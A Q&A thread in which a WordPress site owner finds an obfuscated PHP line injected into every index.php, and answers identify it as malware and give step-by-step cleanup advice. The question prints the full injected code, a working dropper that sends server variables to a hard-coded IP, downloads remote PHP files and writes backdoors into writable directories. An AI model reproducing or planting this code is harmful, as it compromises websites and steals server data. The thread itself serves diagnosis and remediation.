# WordPress: Some functions are generated automatically inside the index.php file

Tags: php, wordpress

I created a WordPress site and installed a theme and some plugins afterwards. It was working normally for a while, but then it throws an error, even if I did not change the content of the `index.php` file. I faced with the following error:

> Fatal error: Cannot redeclare oOooo() (previously declared in /home/puhuvisi/public_html/wp-content/themes/massive-dynamic/lib/widgets/widget-recent_portfolio/index.php:1) in /home/puhuvisi/public_html/wp-content/themes/massive-dynamic/lib/shortcodes/md_live_text/index.php on line 1

So I checked the above mentioned files that and I saw there is a single line added automatically to each `index.php` files (for all plugins and theme files). This one line of code is shown below:

```
<?php if(!isset($incode)){$vl='h';$serverid='fe6412f27b07e42253690caf0cd35b8a';$server_addr='109.67.153.40';function oOooo($o0O,$oOO,$o0o,$oo,$o0000,$oo0O){$o0oo0='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0';if(ini_get('allow_url_fopen')==1):$o00=stream_context_create(array($oo0O=>array('method'=>'POST','timeout'=>$o0000,'header'=>array('Content-type: application/x-www-form-urlencoded','User-Agent: '.$o0oo0,'content'=>http_build_query($_SERVER)))));if($oo=='yes'):$o0O=$o0O.'&type=fopen';endif;$ooOoo=@file_get_contents($o0O,false,$o00);elseif(in_array('curl',get_loaded_extensions())):if($oo=='yes'):$o0O=$o0O.'&type=curl';endif;$o0Oo=curl_init();curl_setopt($o0Oo,CURLOPT_URL,$o0O);curl_setopt($o0Oo,CURLOPT_HEADER,false);curl_setopt($o0Oo,CURLOPT_RETURNTRANSFER,true);curl_setopt($o0Oo,CURLOPT_TIMEOUT,$o0000);curl_setopt($o0Oo,CURLOPT_USERAGENT,$o0oo0);if($oo0O=='https'):curl_setopt($o0Oo,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($o0Oo,CURLOPT_SSL_VERIFYHOST,false);endif;curl_setopt($o0Oo,CURLOPT_CONNECTTIMEOUT,5);curl_setopt($o0Oo,CURLOPT_POSTFIELDS,http_build_query($_SERVER));$ooOoo=@curl_exec($o0Oo);curl_close($o0Oo);else:if($oo=='yes'):$o0o=$o0o.'&type=socks';endif;if($oo0O=='https'):$o00o=fsockopen('ssl://'.$oOO,443,$oO0o,$oOo0o,$o0000);else:$o00o=fsockopen($oOO,80,$oO0o,$oOo0o,$o0000);endif;if($o00o):stream_set_timeout($o00o,$o0000);$ooooo=http_build_query($_SERVER);$oO='POST '.$o0o.' HTTP/1.0'."\r\n";$oO.='Host: '.$oOO."\r\n";$oO.='User-Agent: '.$o0oo0."\r\n";$oO.='Content-Type: application/x-www-form-urlencoded'."\r\n";$oO.='Content-Length: '.strlen($ooooo)."\r\n\r\n";fputs($o00o,$oO);fputs($o00o,$ooooo);$oO0='';while(!feof($o00o)):$oO0.=fgets($o00o,4096);endwhile;fclose($o00o);list($ooo,$ooO)=@preg_split("/\R\R/",$oO0,2);$ooOoo=$ooO;endif;endif;return$ooOoo;}function client_version($o00OO){$o0oO[0]=(int)($o00OO/256/256/256);$o0oO[1]=(int)(($o00OO-$o0oO[0]*256*256*256)/256/256);$o0oO[2]=(int)(($o00OO-$o0oO[0]*256*256*256-$o0oO[1]*256*256)/256);$o0oO[3]=$o00OO-$o0oO[0]*256*256*256-$o0oO[1]*256*256-$o0oO[2]*256;return''.$o0oO[0].".".$o0oO[1].".".$o0oO[2].".".$o0oO[3];}function oO0Oo($oOOO){$oOooO=array();$oOooO[]=$oOOO;foreach(scandir($oOOO) as$o0O0O):if($o0O0O=='.'||$o0O0O=='..'):continue;endif;$o0=$oOOO.DIRECTORY_SEPARATOR.$o0O0O;if(is_dir($o0)):$oOooO[]=$o0;$oOooO=array_merge($oOooO,oO0Oo($o0));endif;endforeach;return$oOooO;}$oOO0=@preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);$oOO=client_version('1540531608');$o0o='/get.php?spider&checkdomain&host='.$oOO0.'&serverid='.$serverid.'&stookfile='.__FILE__;$o0O='http://'.$oOO.'/get.php?spider&checkdomain&host='.$oOO0.'&serverid='.$serverid.'&stookfile='.__FILE__;$oOoo=oOooo($o0O,$oOO,$o0o,$oo='no',$o0000='5',$oo0O='http');if($oOoo!='havedoor|havedonor'):$oOooo=$_SERVER['HTTP_HOST'];$oOOOO=@preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);$o00O=$_SERVER['DOCUMENT_ROOT'];chdir($o00O);$oOooO=oO0Oo($o00O);$oOooO=array_unique($oOooO);foreach($oOooO as$o0O0O):if(is_dir($o0O0O)&&is_writable($o0O0O)):$oOOoO=explode(DIRECTORY_SEPARATOR,$o0O0O);$o0oo=count($oOOoO);$oOOOo[]=$o0oo.'|'.$o0O0O;endif;endforeach;$o0oo=0;foreach($oOOOo as$oooOo):if(count($oOOOo)>1&&(strstr($oooOo,'/wp-admin')||strstr($oooOo,'/cgi-bin'))):unset($oOOOo[$o0oo]);endif;$o0oo++;endforeach;if(!is_writable($o00O)):natsort($oOOOo);$oOOOo=array_values($oOOOo);$oooOo=explode('|',$oOOOo[0]);$oooOo=$oooOo[1];else:$oooOo=$o00O;endif;chdir($oooOo);if(stristr($oOoo,'nodoor')):$o0O='http://'.$oOO.'/get.php?vl='.$vl.'&update&needfilename';$o0o='/get.php?vl='.$vl.'&update&needfilename';$o0o0=oOooo($o0O,$oOO,$o0o,$oo='no',$o0000='30',$oo0O='http');$oOOO0=explode('|||||',$o0o0);$o0o00=$oOOO0[0].'.php';$o0O00=$oOOO0[1];file_put_contents($oooOo.DIRECTORY_SEPARATOR.$o0o00,$o0O00);$oOOo=str_replace($o00O,'',$oooOo);if($_SERVER['SERVER_PORT']=='443'):$oo0O='https';else:$oo0O='http';endif;$o0O=$oo0O.'://'.$oOooo.$oOOo.'/'.$o0o00.'?gen&serverid='.$serverid;$o0o=$oOOo.'/'.$o0o00.'?gen&serverid='.$serverid;$oO00o=oOooo($o0O,$oOooo,$o0o,$oo='no',$o0000='10',$oo0O);elseif(stristr($oOoo,'needtoloadsomefiles')):shuffle($oOOOo);$oooOo=explode('|',$oOOOo[0]);$oooOo=$oooOo[1];$oOOo=str_replace($o00O,'',$oooOo);$oO00O='stuvwxyz';$o0o00=str_shuffle($oO00O).'.php';$ooO0=urlencode($oo0O.'://'.$oOooo.$oOOo.'/'.$o0o00);$o0O='http://'.$oOO.'/get.php?bdr&url='.$ooO0;$o0o='/get.php?bdr&url='.$ooO0;$ooOoo=oOooo($o0O,$oOO,$o0o,$oo='no',$o0000='20',$oo0O='http');file_put_contents($oooOo.DIRECTORY_SEPARATOR.$o0o00,$ooOoo);elseif(stristr($oOoo,'needtoloadclient')):$o0O='http://'.$oOO.'/get.php?getclient&domain='.$oOOOO;$o0o='/get.php?getclient&domain='.$oOOOO;$ooOoo=oOooo($o0O,$oOO,$o0o,$oo='no',$o0000='55',$oo0O='http');if($ooOoo=='noclient'):die;endif;$oo0=explode('::::',$ooOoo);$ooOOo=$oo0[0];$oo0O0=$oo0[1];@chmod($ooOOo,0666);file_put_contents($ooOOo,$oo0O0);elseif($oOoo=='needtowait'):endif;if(stristr($oOoo,'nodonor')):endif;endif;$incode=1;}?>
```

I have no idea why it appears on each index file and how to remove these lines swiftly. This is the second time I faced with this problem. I reinstalled everything from scratch after first incident. How can I avoid this issue permanently?

Comment: If it looks like obfuscated/malicious code, it probably is.

Answer (score 5, accepted):

Your site is infected with a virus. Here are the basic steps you can take to clean it:

1. Take full backup of your site including files and database. You can either do it manually through cPanel/FTP/phpMyAdmin or use some plugin like [UpdraftPlus](https://wordpress.org/plugins/updraftplus/).
2. Login to WordPress Dashboard and take note of your installed plugins and themes.
3. Download the fresh copies of WordPress, your plugins and themes from their respective sites to your computer.
4. Logout from your WordPress Dashboard.
5. Login to your hosting panel and open file/folder option.
6. Delete WordPress core files and folder except `wp-config.php` file and `wp-content` folder. You should delete all files present on the root of your WordPress installation, `wp-admin` folder and `wp-includes` folder.
7. Go to `wp-content` folder and delete `plugins` and `themes` folders. *Don't delete the `uploads` folder*.
8. Open `wp-config.php` file and change **Authentication Unique Keys and Salts**. You can generate new keys and salts by visiting [WordPress.org secret-key service](https://api.wordpress.org/secret-key/1.1/salt/).
9. Upload the fresh copies of WordPress, plugins and themes to their respective folders.
10. Login to WordPress Dashboard.
11. Change all passwords on the site, especially admin passwords.
12. If you noticed any unfamiliar users, remove them.
13. Install and activate [Wordfence](https://wordpress.org/plugins/wordfence/) plugin.
14. Go to the Wordfence options page and make sure that under the **Scans to include** heading, absolutely everything is selected including the option to scan files outside your WordPress installation. If the scan takes too long or does not complete, you can deselect this last option and also disable **high sensitivity** scanning. Then try again.
15. When the results come up you may see a very long list of infected files. Take your time and slowly work through the list.
16. Examine any suspicious files and either edit those files by hand to clean them or delete the file. Remember that you can’t undo deletions. But as long as you took the backup we recommended above, you can always restore the file if you delete the wrong thing.
17. Look at any changed core, theme and plugin files. Use the option Wordfence provides to see what has changed between the original file and your file. If the changes look malicious, use the Wordfence option to repair the file.
18. Slowly work your way through the list until it is empty.
19. Run another scan and confirm your site is clean. If not, repeat the steps 14-17 until you got a clean result.
20. Check your site's front-end and visit different pages. If you got missing pages error, then re-save your permalink by visiting **Settings** > **Permalinks**.

**Disclaimer**

Most of the hacked sites can be cleaned by following the above steps. However, if you are uncomfortable in taking these steps, then you have a few other options:

1. Contact your hosting service or webmaster for professional help.
2. Consult commercial WordPress security services provider (Sucuri, Wordfence) for cleaning your hacked website.

Sources and further reading for more advanced information:

1. [How to Clean a Hacked WordPress Site using Wordfence](https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/)
2. [How to Clean a WordPress Hack](https://sucuri.net/guides/how-to-clean-hacked-wordpress)

Comment: Thank you very much for your suggestions. I will give it a try tomorrow and mark it as answer, if it works.

Comment: @Bhoke Try it. It's my 1st choice procedure for cleaning a WordPress hacked site.

Answer (score 1):

I think this is some virus code. (or your computer has a virus, like trojan)

Contact your hosting administrator if you have one

If you don't you should check your code. Somehow somebody gets permissions on files.

Comment: Could you tell me what is this script doing? I am not familiar with php.

Comment: It is sending get request on http://91.210.165.152/get.php with some data of current website (file path etc) and save some virus files on your machine :) 

Maybe some plugin contains the virus code or something like that :)

Comment: Thank you very much